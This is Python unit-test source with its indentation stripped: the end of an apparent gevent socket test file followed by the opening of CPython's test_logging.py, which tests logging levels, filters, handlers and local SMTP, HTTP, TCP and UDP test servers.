self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
acceptor.join()
client.close()
client_sock[0][0].close()
# On Windows send() accepts whatever is thrown at it
if sys.platform != 'win32':
_test_sendall_timeout_check_time = True
# Travis-CI container infrastructure is configured with
# large socket buffers, at least 2MB, as-of Jun 3, 2015,
# so we must be sure to send more data than that.
_test_sendall_data = b'hello' * 1000000
def test_sendall_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
time.sleep(0.1)
assert client_sock
client.settimeout(0.1)
start = time.time()
try:
self.assertRaises(self.TIMEOUT_ERROR, client.sendall, self._test_sendall_data)
if self._test_sendall_timeout_check_time:
took = time.time() - start
assert 0.09 <= took <= 0.2, took
finally:
acceptor.join()
client.close()
client_sock[0][0].close()
def test_makefile(self):
def accept_once():
conn, addr = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.close()
conn.close() # for pypy
acceptor = Thread(target=accept_once)
client = self.create_connection()
fd = client.makefile(mode='rb')
client.close()
assert fd.readline() == b'hello\n'
assert fd.read() == b''
fd.close()
acceptor.join()
def test_makefile_timeout(self):
def accept_once():
conn, addr = self.listener.accept()
try:
time.sleep(0.3)
finally:
conn.close() # for pypy
acceptor = Thread(target=accept_once)
client = self.create_connection()
client.settimeout(0.1)
fd = client.makefile(mode='rb')
self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
client.close()
fd.close()
acceptor.join()
def test_attributes(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
self.assertEqual(socket.AF_INET, s.type)
self.assertEqual(socket.SOCK_DGRAM, s.family)
self.assertEqual(0, s.proto)
if hasattr(socket, 'SOCK_NONBLOCK'):
s.settimeout(1)
self.assertEqual(socket.AF_INET, s.type)
s.setblocking(0)
std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
std_socket.setblocking(0)
self.assertEqual(std_socket.type, s.type)
s.close()
def get_port():
tempsock = socket.socket()
tempsock.bind(('', 0))
port = tempsock.getsockname()[1]
tempsock.close()
return port
class TestCreateConnection(greentest.TestCase):
__timeout__ = 5
def test(self):
try:
socket.create_connection(('localhost', get_port()), timeout=30, source_address=('', get_port()))
except socket.error as ex:
if 'refused' not in str(ex).lower():
raise
else:
raise AssertionError('create_connection did not raise socket.error as expected')
class TestFunctions(greentest.TestCase):
def test_wait_timeout(self):
# Issue #635
import gevent.socket
import gevent._socketcommon
orig_get_hub = gevent.socket.get_hub
class get_hub(object):
def wait(self, io):
gevent.sleep(10)
class io(object):
callback = None
gevent._socketcommon.get_hub = get_hub
try:
try:
gevent.socket.wait(io(), timeout=0.01)
except gevent.socket.timeout:
pass
else:
self.fail("Should raise timeout error")
finally:
gevent._socketcommon.get_hub = orig_get_hub
# Creating new types in the function takes a cycle to cleanup.
test_wait_timeout.ignore_leakcheck = True
if __name__ == '__main__':
greentest.main()
|
test_logging.py
|
# Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import cosmo
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import time
import unittest
import warnings
import weakref
try:
import _thread
import threading
# The following imports are needed only for tests which
# require threading
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
except ImportError:
threading = None
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
loggerDict = logging.getLogger().manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
('INF.ERR.UNDEF', 'ERROR', '6'),
])
def test_nested_with_virtual_parent(self):
# Logging levels when some parent does not exist yet.
m = self.next_message
INF = logging.getLogger("INF")
GRANDCHILD = logging.getLogger("INF.BADPARENT.UNDEF")
CHILD = logging.getLogger("INF.BADPARENT")
INF.setLevel(logging.INFO)
# These should log.
GRANDCHILD.log(logging.FATAL, m())
GRANDCHILD.info(m())
CHILD.log(logging.FATAL, m())
CHILD.info(m())
# These should not log.
GRANDCHILD.debug(m())
CHILD.debug(m())
self.assert_log_lines([
('INF.BADPARENT.UNDEF', 'CRITICAL', '1'),
('INF.BADPARENT.UNDEF', 'INFO', '2'),
('INF.BADPARENT', 'CRITICAL', '3'),
('INF.BADPARENT', 'INFO', '4'),
])
def test_regression_22386(self):
"""See issue #22386 for more information."""
self.assertEqual(logging.getLevelName('INFO'), logging.INFO)
self.assertEqual(logging.getLevelName(logging.INFO), 'INFO')
def test_issue27935(self):
fatal = logging.getLevelName('FATAL')
self.assertEqual(fatal, logging.FATAL)
def test_regression_29220(self):
"""See issue #29220 for more information."""
logging.addLevelName(logging.INFO, '')
self.addCleanup(logging.addLevelName, logging.INFO, 'INFO')
self.assertEqual(logging.getLevelName(logging.INFO), '')
self.assertEqual(logging.getLevelName(logging.NOTSET), 'NOTSET')
self.assertEqual(logging.getLevelName('NOTSET'), logging.NOTSET)
class BasicFilterTest(BaseTest):
"""Test the bundled Filter class."""
def test_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
filter_ = logging.Filter("spam.eggs")
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filter_)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filter_)
def test_callable_filter(self):
# Only messages satisfying the specified criteria pass through the
# filter.
def filterfunc(record):
parts = record.name.split('.')
prefix = '.'.join(parts[:2])
return prefix == 'spam.eggs'
handler = self.root_logger.handlers[0]
try:
handler.addFilter(filterfunc)
spam = logging.getLogger("spam")
spam_eggs = logging.getLogger("spam.eggs")
spam_eggs_fish = logging.getLogger("spam.eggs.fish")
spam_bakedbeans = logging.getLogger("spam.bakedbeans")
spam.info(self.next_message())
spam_eggs.info(self.next_message()) # Good.
spam_eggs_fish.info(self.next_message()) # Good.
spam_bakedbeans.info(self.next_message())
self.assert_log_lines([
('spam.eggs', 'INFO', '2'),
('spam.eggs.fish', 'INFO', '3'),
])
finally:
handler.removeFilter(filterfunc)
def test_empty_filter(self):
f = logging.Filter()
r = logging.makeLogRecord({'name': 'spam.eggs'})
self.assertTrue(f.filter(r))
#
# First, we define our levels. There can be as many as you want - the only
# limitations are that they should be integers, the lowest should be > 0 and
# larger values mean less information being logged. If you need specific
# level values which do not fit into these limitations, you can use a
# mapping dictionary to convert between your application levels and the
# logging system.
#
SILENT = 120
TACITURN = 119
TERSE = 118
EFFUSIVE = 117
SOCIABLE = 116
VERBOSE = 115
TALKATIVE = 114
GARRULOUS = 113
CHATTERBOX = 112
BORING = 111
LEVEL_RANGE = range(BORING, SILENT + 1)
#
# Next, we define names for our levels. You don't need to do this - in which
# case the system will use "Level n" to denote the text for the level.
#
my_logging_levels = {
SILENT : 'Silent',
TACITURN : 'Taciturn',
TERSE : 'Terse',
EFFUSIVE : 'Effusive',
SOCIABLE : 'Sociable',
VERBOSE : 'Verbose',
TALKATIVE : 'Talkative',
GARRULOUS : 'Garrulous',
CHATTERBOX : 'Chatterbox',
BORING : 'Boring',
}
class GarrulousFilter(logging.Filter):
"""A filter which blocks garrulous messages."""
def filter(self, record):
return record.levelno != GARRULOUS
class VerySpecificFilter(logging.Filter):
"""A filter which blocks sociable and taciturn messages."""
def filter(self, record):
return record.levelno not in [SOCIABLE, TACITURN]
class CustomLevelsAndFiltersTest(BaseTest):
"""Test various filtering possibilities with custom logging levels."""
# Skip the logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
for k, v in my_logging_levels.items():
logging.addLevelName(k, v)
def log_at_all_levels(self, logger):
for lvl in LEVEL_RANGE:
logger.log(lvl, self.next_message())
def test_logger_filter(self):
# Filter at logger level.
self.root_logger.setLevel(VERBOSE)
# Levels >= 'Verbose' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
def test_handler_filter(self):
# Filter at handler level.
self.root_logger.handlers[0].setLevel(SOCIABLE)
try:
# Levels >= 'Sociable' are good.
self.log_at_all_levels(self.root_logger)
self.assert_log_lines([
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
])
finally:
self.root_logger.handlers[0].setLevel(logging.NOTSET)
def test_specific_filters(self):
# Set a specific filter object on the handler, and then add another
# filter object on the logger itself.
handler = self.root_logger.handlers[0]
specific_filter = None
garr = GarrulousFilter()
handler.addFilter(garr)
try:
self.log_at_all_levels(self.root_logger)
first_lines = [
# Notice how 'Garrulous' is missing
('Boring', '1'),
('Chatterbox', '2'),
('Talkative', '4'),
('Verbose', '5'),
('Sociable', '6'),
('Effusive', '7'),
('Terse', '8'),
('Taciturn', '9'),
('Silent', '10'),
]
self.assert_log_lines(first_lines)
specific_filter = VerySpecificFilter()
self.root_logger.addFilter(specific_filter)
self.log_at_all_levels(self.root_logger)
self.assert_log_lines(first_lines + [
# Not only 'Garrulous' is still missing, but also 'Sociable'
# and 'Taciturn'
('Boring', '11'),
('Chatterbox', '12'),
('Talkative', '14'),
('Verbose', '15'),
('Effusive', '17'),
('Terse', '18'),
('Silent', '20'),
])
finally:
if specific_filter:
self.root_logger.removeFilter(specific_filter)
handler.removeFilter(garr)
class HandlerTest(BaseTest):
def test_name(self):
h = logging.Handler()
h.name = 'generic'
self.assertEqual(h.name, 'generic')
h.name = 'anothergeneric'
self.assertEqual(h.name, 'anothergeneric')
self.assertRaises(NotImplementedError, h.emit, None)
def test_builtin_handlers(self):
# We can't actually *use* too many handlers in the tests,
# but we can try instantiating them with various options
if sys.platform in ('linux', 'darwin'):
for existing in (True, False):
fd, fn = tempfile.mkstemp()
os.close(fd)
if not existing:
os.unlink(fn)
h = logging.handlers.WatchedFileHandler(fn, delay=True)
if existing:
dev, ino = h.dev, h.ino
self.assertEqual(dev, -1)
self.assertEqual(ino, -1)
r = logging.makeLogRecord({'msg': 'Test'})
h.handle(r)
# Now remove the file.
os.unlink(fn)
self.assertFalse(os.path.exists(fn))
# The next call should recreate the file.
h.handle(r)
self.assertTrue(os.path.exists(fn))
else:
self.assertEqual(h.dev, -1)
self.assertEqual(h.ino, -1)
h.close()
if existing:
os.unlink(fn)
if sys.platform == 'darwin':
sockname = '/var/run/syslog'
else:
sockname = '/dev/log'
try:
h = logging.handlers.SysLogHandler(sockname)
self.assertEqual(h.facility, h.LOG_USER)
self.assertTrue(h.unixsocket)
h.close()
except OSError: # syslogd might not be available
pass
for method in ('GET', 'POST', 'PUT'):
if method == 'PUT':
self.assertRaises(ValueError, logging.handlers.HTTPHandler,
'localhost', '/log', method)
else:
h = logging.handlers.HTTPHandler('localhost', '/log', method)
h.close()
h = logging.handlers.BufferingHandler(0)
r = logging.makeLogRecord({})
self.assertTrue(h.shouldFlush(r))
h.close()
h = logging.handlers.BufferingHandler(1)
self.assertFalse(h.shouldFlush(r))
h.close()
def test_path_objects(self):
"""
Test that Path objects are accepted as filename arguments to handlers.
See Issue #27493.
"""
fd, fn = tempfile.mkstemp()
os.close(fd)
os.unlink(fn)
pfn = pathlib.Path(fn)
cases = (
(logging.FileHandler, (pfn, 'w')),
(logging.handlers.RotatingFileHandler, (pfn, 'a')),
(logging.handlers.TimedRotatingFileHandler, (pfn, 'h')),
)
if sys.platform in ('linux', 'darwin'):
cases += ((logging.handlers.WatchedFileHandler, (pfn, 'w')),)
for cls, args in cases:
h = cls(*args)
self.assertTrue(os.path.exists(fn))
h.close()
os.unlink(fn)
@unittest.skipIf(os.name == 'nt', 'WatchedFileHandler not appropriate for Windows.')
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_race(self):
# Issue #14632 refers.
def remove_loop(fname, tries):
for _ in range(tries):
try:
os.unlink(fname)
self.deletion_time = time.time()
except OSError:
pass
time.sleep(0.004 * random.randint(0, 4))
del_count = 500
log_count = 500
self.handle_time = None
self.deletion_time = None
for delay in (False, True):
fd, fn = tempfile.mkstemp('.log', 'test_logging-3-')
os.close(fd)
remover = threading.Thread(target=remove_loop, args=(fn, del_count))
remover.daemon = True
remover.start()
h = logging.handlers.WatchedFileHandler(fn, delay=delay)
f = logging.Formatter('%(asctime)s: %(levelname)s: %(message)s')
h.setFormatter(f)
try:
for _ in range(log_count):
time.sleep(0.005)
r = logging.makeLogRecord({'msg': 'testing' })
try:
self.handle_time = time.time()
h.handle(r)
except Exception:
print('Deleted at %s, '
'opened at %s' % (self.deletion_time,
self.handle_time))
raise
finally:
remover.join()
h.close()
if os.path.exists(fn):
os.unlink(fn)
class BadStream(object):
def write(self, data):
raise RuntimeError('deliberate mistake')
class TestStreamHandler(logging.StreamHandler):
def handleError(self, record):
self.error_record = record
class StreamHandlerTest(BaseTest):
def test_error_handling(self):
h = TestStreamHandler(BadStream())
r = logging.makeLogRecord({})
old_raise = logging.raiseExceptions
try:
h.handle(r)
self.assertIs(h.error_record, r)
h = logging.StreamHandler(BadStream())
with support.captured_stderr() as stderr:
h.handle(r)
msg = '\nRuntimeError: deliberate mistake\n'
self.assertIn(msg, stderr.getvalue())
logging.raiseExceptions = False
with support.captured_stderr() as stderr:
h.handle(r)
self.assertEqual('', stderr.getvalue())
finally:
logging.raiseExceptions = old_raise
# -- The following section could be moved into a server_helper.py module
# -- if it proves to be of wider utility than just test_logging
if threading:
class TestSMTPServer(smtpd.SMTPServer):
"""
This class implements a test SMTP server.
:param addr: A (host, port) tuple which the server listens on.
You can specify a port value of zero: the server's
*port* attribute will hold the actual port number
used, which can be used in client connections.
:param handler: A callable which will be called to process
incoming messages. The handler will be passed
the client address tuple, who the message is from,
a list of recipients and the message data.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
try:
asyncore.loop(poll_interval, map=self._map)
except OSError:
# On FreeBSD 8, closing the server repeatably
# raises this error. We swallow it if the
# server has been closed.
if self.connected or self.accepting:
raise
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
self._thread.join(timeout)
asyncore.close_all(map=self._map, ignore_all=True)
self._thread = None
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.setDaemon(True)
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
self._thread.join(timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
_block_on_close = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
_block_on_close = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
